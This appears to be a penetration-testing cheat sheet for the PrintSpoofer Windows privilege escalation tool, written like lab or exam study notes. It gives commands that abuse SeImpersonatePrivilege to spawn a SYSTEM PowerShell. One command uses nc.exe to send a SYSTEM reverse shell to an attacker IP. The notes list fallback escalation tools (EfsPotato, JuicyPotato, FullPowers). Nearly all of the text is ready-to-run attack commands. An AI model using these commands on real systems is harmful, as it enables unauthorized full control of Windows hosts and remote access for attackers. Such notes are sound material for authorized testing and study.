PrintSpoofer
Description
Windows privilege escalation tool that exploits SeImpersonatePrivilege to escalate from a service account to NT AUTHORITY\SYSTEM. When a service account has SeImpersonatePrivilege enabled, PrintSpoofer can be used to spawn a process as SYSTEM.
Usage 1: Spawn an Interactive PowerShell as SYSTEM
Use the -i flag for interactive mode and -c to specify the command to execute. This spawns an interactive PowerShell session running as NT AUTHORITY\SYSTEM.
Command:
.\PrintSpoofer32.exe -i -c powershell
Usage 2: Spawn an Interactive PowerShell with Full Path
Specify the full path to the PowerShell executable for environments where the short name may not resolve.
Command:
.\PrintSpoofer32.exe -i -c 'C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe'
Usage 3: Get a Reverse Shell as SYSTEM
Instead of spawning an interactive shell, use PrintSpoofer to execute a reverse shell via nc.exe back to the attacker machine.
Command:
C:\Users\Tony\Desktop\PrintSpoofer32.exe -c "C:\Users\Tony\Desktop\nc.exe 192.168.45.187 445 -e cmd"
Notes
- Requires
SeImpersonatePrivilegeto be enabled (check withwhoami /priv). - Service accounts typically have SeImpersonatePrivilege enabled by default.
- If PrintSpoofer does not work (e.g., timeout errors), try alternative tools such as EfsPotato or JuicyPotato.
- If the account is
nt authority\local serviceand lacks SeImpersonatePrivilege, use FullPowers.exe first to recover the default privilege set including SeImpersonatePrivilege.